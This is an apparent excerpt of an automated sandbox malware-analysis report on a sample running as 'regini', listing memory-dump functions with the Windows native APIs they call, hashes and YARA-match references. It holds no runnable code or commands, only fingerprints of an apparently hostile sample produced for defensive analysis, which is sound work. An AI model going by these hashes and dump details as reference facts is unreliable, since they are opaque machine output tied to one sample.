                                                                              • API String ID: 3541575487-0
                                                                              • Opcode ID: 3e55da1cfd8cad6bbb757cd532cfe8eb3c10e6acfd91596a3322c7845f83d105
                                                                              • Instruction ID: ac124fa2fd66a705e654a6de893c80c9e549146a35bdb37765bb0c06894b6825
                                                                              • Opcode Fuzzy Hash: 3e55da1cfd8cad6bbb757cd532cfe8eb3c10e6acfd91596a3322c7845f83d105
                                                                              • Instruction Fuzzy Hash: C7318E72A40308BBEB20DFA1CCC5FEF777D9F44744F10455AB91CA6180DBB0AA848BA1
                                                                              Function 024293F0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtCreateFile.NTDLL(?,24064BBE,?,?,?,?,?,?,?,?,?), ref: 024294E8
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 89953b318f57b8eeb3b94e37ccb434cef16c25349bd0a665c16f5a89a13f60d4
                                                                              • Instruction ID: e434e911b8fb2cfb0d2b194b815d8e8585ba6eaadfcf03e79c8d897e82bc0918
                                                                              • Opcode Fuzzy Hash: 89953b318f57b8eeb3b94e37ccb434cef16c25349bd0a665c16f5a89a13f60d4
                                                                              • Instruction Fuzzy Hash: BE31D5B5A01258ABCB14DF99D880EEEB7B9EF8C300F508219F919A7344D730A9558FA4
                                                                              Function 02429550 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtReadFile.NTDLL(?,24064BBE,?,?,?,?,?,?,?), ref: 02429633
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: d010eacb628a258346aa53aefa1bed7b249c9d68a6701697dc2ea1d6fb028099
                                                                              • Instruction ID: 7013eb03738123afe2fc74c93ead22af4765b7f12f9e4873cf1a14bae906d0b0
                                                                              • Opcode Fuzzy Hash: d010eacb628a258346aa53aefa1bed7b249c9d68a6701697dc2ea1d6fb028099
                                                                              • Instruction Fuzzy Hash: 4B31EAB5A00258ABCB14DF99C880EEF77B9EF88310F10861AFD19A7344D770A9518FA5
                                                                              Function 02429850 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(024120BB,24064BBE,024281DF,00000000,00000004,00003000,?,?,?,?,?,024281DF,024120BB), ref: 02429912
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: cedafb1025b038325b921a273ed17e15dc8af73268ddac6631b876435128dcc7
                                                                              • Instruction ID: 2b2e92c80e7a79536b5c396f675591a0b8f9cbaa4449d50ecec43161f83eb838
                                                                              • Opcode Fuzzy Hash: cedafb1025b038325b921a273ed17e15dc8af73268ddac6631b876435128dcc7
                                                                              • Instruction Fuzzy Hash: 6D212BB5A00258ABDB10DF99DC41FEF77BAEF88300F10851EFD18A7244D770A9118BA5
                                                                              Function 02429640 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteFile
                                                                              • String ID:
                                                                              • API String ID: 4033686569-0
                                                                              • Opcode ID: e2871cfb3dc0ff402a426fcbebe61238aa19fe36c2eaceb1abd14c6b07a2ed57
                                                                              • Instruction ID: 116f78e22bc1c5d1d5020d977142c4c7919e56ca5694acd1b8fbe8d33b9afc3e
                                                                              • Opcode Fuzzy Hash: e2871cfb3dc0ff402a426fcbebe61238aa19fe36c2eaceb1abd14c6b07a2ed57
                                                                              • Instruction Fuzzy Hash: 4B11A071A002187BD620EB66CC41FAF73ADEF85704F40454EFA1C6B280E77579158BE5
                                                                              Function 024296E0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 02429717
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3750507346.0000000002400000.00000040.80000000.00040000.00000000.sdmp, Offset: 02400000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2400000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                              • Instruction ID: 928e0f9d8b2874fcd3952001ba9e6d87657e4a78d9b6fc3e5e7ba0876e66ad8b
                                                                              • Opcode Fuzzy Hash: 865acb2d5640172cea7701e8b8a714ff6b9d74cb1f623fdfa03c7267b3d5827b
                                                                              • Instruction Fuzzy Hash: 0BE04F352002147BC220AA6ADC40FAB775DDFC6710F108819FA4D77240C671791087F0
                                                                              Function 02B84340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: bc771f31e00e7717566d338aebd48cba6bdd53abdc1809b3578acba54ae3d875
                                                                              • Instruction ID: 10a8630663433a75965193aed2425aa9c2b87ce7b07c47b47954d749c11a12ea
                                                                              • Opcode Fuzzy Hash: bc771f31e00e7717566d338aebd48cba6bdd53abdc1809b3578acba54ae3d875
                                                                              • Instruction Fuzzy Hash: 9F90023260580012954071584884547400597E1301B55C061E0528555C8A148A565365
                                                                              Function 02B84650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 6d47d3410e37b3d4b116479dd333f95c3b3129f43e8725005b6337dd0a6936af
                                                                              • Instruction ID: 8753e1237546bace819167ba909bef874d3536c9026e9758065804633d81ff6e
                                                                              • Opcode Fuzzy Hash: 6d47d3410e37b3d4b116479dd333f95c3b3129f43e8725005b6337dd0a6936af
                                                                              • Instruction Fuzzy Hash: 8890027260150042454071584804407600597E2301395C165E0658561C86188955926D
                                                                              Function 02B82AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 360810982bc4e3a0ed9f54e32f4f3fb3266b6c878a4fde357ed43f3c541d02d3
                                                                              • Instruction ID: 096609e0007273e7890e86b697533c49f8b5e696c1a7bd526ba8f63cf832a6da
                                                                              • Opcode Fuzzy Hash: 360810982bc4e3a0ed9f54e32f4f3fb3266b6c878a4fde357ed43f3c541d02d3
                                                                              • Instruction Fuzzy Hash: 15900236221400020545B558060450B044597D7351395C065F151A591CC62189655325
                                                                              Function 02B82AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 9b933dab8ac00e8563b29037e972f17cb7a1b0eb995c566e3f1df738996de265
                                                                              • Instruction ID: 4258c177ddb2a76a5039e1370ff7f49bb0d70183d54e55d4a83190e720257728
                                                                              • Opcode Fuzzy Hash: 9b933dab8ac00e8563b29037e972f17cb7a1b0eb995c566e3f1df738996de265
                                                                              • Instruction Fuzzy Hash: FE900437311400030505F55C07045070047C7D7351355C071F111D551CD731CD715135
                                                                              Function 02B82BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 73a40fad0d6aab53520146d3f03d8251810750bf45f892b4c0c4cad5e1c93e3c
                                                                              • Instruction ID: a2aec4f293a2223d3b7f0ce3fdb7a9cb07fe4092effeaf0189dce101fe214409
                                                                              • Opcode Fuzzy Hash: 73a40fad0d6aab53520146d3f03d8251810750bf45f892b4c0c4cad5e1c93e3c
                                                                              • Instruction Fuzzy Hash: E590023260540802D55071584414747000587D1301F55C061E0128655D87558B5576A5
                                                                              Function 02B82BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 66bb618ddb3cc66ee925b15310b3d99d1bb28d977cc1fdd39d503856b16fb06f
                                                                              • Instruction ID: 21680c3e9b1eabf4fb714418123a8637a46472f80fba6b12a4d11b18e72edfd0
                                                                              • Opcode Fuzzy Hash: 66bb618ddb3cc66ee925b15310b3d99d1bb28d977cc1fdd39d503856b16fb06f
                                                                              • Instruction Fuzzy Hash: FC90023220140802D5807158440464B000587D2301F95C065E0129655DCA158B5977A5
                                                                              Function 02B82BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 12bf8f236a9f0b51ec83cbcca1e9065a4a24135ff8cc10cbed371f278e6429c0
                                                                              • Instruction ID: d6c2242da1ff3b1fe42fcfc1c7182aa4bd79f261b1b824512db5880fd8dc57f0
                                                                              • Opcode Fuzzy Hash: 12bf8f236a9f0b51ec83cbcca1e9065a4a24135ff8cc10cbed371f278e6429c0
                                                                              • Instruction Fuzzy Hash: 9A90023220544842D54071584404A47001587D1305F55C061E0168695D96258E55B665
                                                                              Function 02B82B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 11f9a60044227462430a838c6d02eed95a749499d9310a7f76525a2ffaa1a0c2
                                                                              • Instruction ID: 7d037b095a0ae8fa953b5cf6a12297438af5b7a5657f22aa9f960375b57c6caa
                                                                              • Opcode Fuzzy Hash: 11f9a60044227462430a838c6d02eed95a749499d9310a7f76525a2ffaa1a0c2
                                                                              • Instruction Fuzzy Hash: 6390027220240003450571584414617400A87E1201B55C071E1118591DC52589916129
                                                                              Function 02B82E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 30180f41563fe970b17a2ce791f471929b77dc470854d1aae428d12e4a82be9f
                                                                              • Instruction ID: b1157c08c71f47dd268d36783a08b877374c5271eff31ae9531752c1568e7362
                                                                              • Opcode Fuzzy Hash: 30180f41563fe970b17a2ce791f471929b77dc470854d1aae428d12e4a82be9f
                                                                              • Instruction Fuzzy Hash: 2A90023260140502D50171584404617000A87D1241F95C072E1128556ECA258A92A135
                                                                              Function 02B82EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: b4e80a544285b234d0479431b84af566b95416f83e260362c83b40fbce973cdc
                                                                              • Instruction ID: 52786a2f815cca3e244b5af0bf0a90866aa461b1bf6d2eb4eedc98b98360cedc
                                                                              • Opcode Fuzzy Hash: b4e80a544285b234d0479431b84af566b95416f83e260362c83b40fbce973cdc
                                                                              • Instruction Fuzzy Hash: 9590027220180403D54075584804607000587D1302F55C061E2168556E8A298D516139
                                                                              Function 02B82FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 4f4a9aaef86ff315834d74dc6951487a11df6f01d24ce86138bbf65f629d3e31
                                                                              • Instruction ID: a103fdeb12da8013a55c69b4a573e4b9be0e1eba970a196f2455c0d1e6dca17b
                                                                              • Opcode Fuzzy Hash: 4f4a9aaef86ff315834d74dc6951487a11df6f01d24ce86138bbf65f629d3e31
                                                                              • Instruction Fuzzy Hash: BD900232601400424540716888449074005ABE2211755C171E0A9C551D855989655669
                                                                              Function 02B82FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 3511eae44ecbfdec1fca662a3868027a7b829ee3f9528c11b99d22a83eab5252
                                                                              • Instruction ID: c9575d2b2661c5c30a1a06fa2bda2289c5887fb20a847763caf0b0df980c2339
                                                                              • Opcode Fuzzy Hash: 3511eae44ecbfdec1fca662a3868027a7b829ee3f9528c11b99d22a83eab5252
                                                                              • Instruction Fuzzy Hash: 6B900232211C0042D60075684C14B07000587D1303F55C165E0258555CC91589615525
                                                                              Function 02B82F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: db9dad00a6938ba2f96f5ef3c65c042babfd9a9eb2e44d29e2ec71ace575aa90
                                                                              • Instruction ID: 7280f2d1374815c1b1467c7259d3a13d89d1452a52e4a0aa374c401ee13eb0f1
                                                                              • Opcode Fuzzy Hash: db9dad00a6938ba2f96f5ef3c65c042babfd9a9eb2e44d29e2ec71ace575aa90
                                                                              • Instruction Fuzzy Hash: F590027234140442D50071584414B070005C7E2301F55C065E1168555D8619CD52612A
                                                                              Function 02B82CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 3cd2b25878ebb340c114af83a9643c8bf8583d009c9b0b784527e186cbb204dc
                                                                              • Instruction ID: 001867e1267e66196cce43d3c7afcd19314575f7b287ef8c2b72c5976dc32887
                                                                              • Opcode Fuzzy Hash: 3cd2b25878ebb340c114af83a9643c8bf8583d009c9b0b784527e186cbb204dc
                                                                              • Instruction Fuzzy Hash: B290023220140402D50075985408647000587E1301F55D061E5128556EC66589916135
                                                                              Function 02B82C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: f754b32fa428dd4857ab2e63ea04354df4b1cd7e1a9fb6aa08da80112305d747
                                                                              • Instruction ID: 034011e06f2df6653e70358c252cd4b0f678d638b52f625d0ebc4fa9fb4bf986
                                                                              • Opcode Fuzzy Hash: f754b32fa428dd4857ab2e63ea04354df4b1cd7e1a9fb6aa08da80112305d747
                                                                              • Instruction Fuzzy Hash: C290023220148802D5107158840474B000587D1301F59C461E4528659D869589917125
                                                                              Function 02B82C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: a63a962e39ceb35762edf9283bdd7043ddbf98f1647aec44bef864310c9ac219
                                                                              • Instruction ID: ea96c47e7eca761cd2bdce701d791a040717ce3b2ff0757eaf3a76215bb73f6f
                                                                              • Opcode Fuzzy Hash: a63a962e39ceb35762edf9283bdd7043ddbf98f1647aec44bef864310c9ac219
                                                                              • Instruction Fuzzy Hash: 7890023220140842D50071584404B47000587E1301F55C066E0228655D8615C9517525
                                                                              Function 02B82DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: b2305f616fdcee10f1ccc918a044aa3b20e8b44296a395a686ac7dc96b926bc3
                                                                              • Instruction ID: e8967be991f73309f9b71bcd5920af13f8d928010c8ab1dbf6854d612d007f68
                                                                              • Opcode Fuzzy Hash: b2305f616fdcee10f1ccc918a044aa3b20e8b44296a395a686ac7dc96b926bc3
                                                                              • Instruction Fuzzy Hash: 8390023220140413D51171584504707000987D1241F95C462E0528559D96568A52A125
                                                                              Function 02B82DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3755692456.0000000002B10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C39000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002C3D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3755692456.0000000002CAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_2b10000_regini.jbxd
                                                                              Similarity
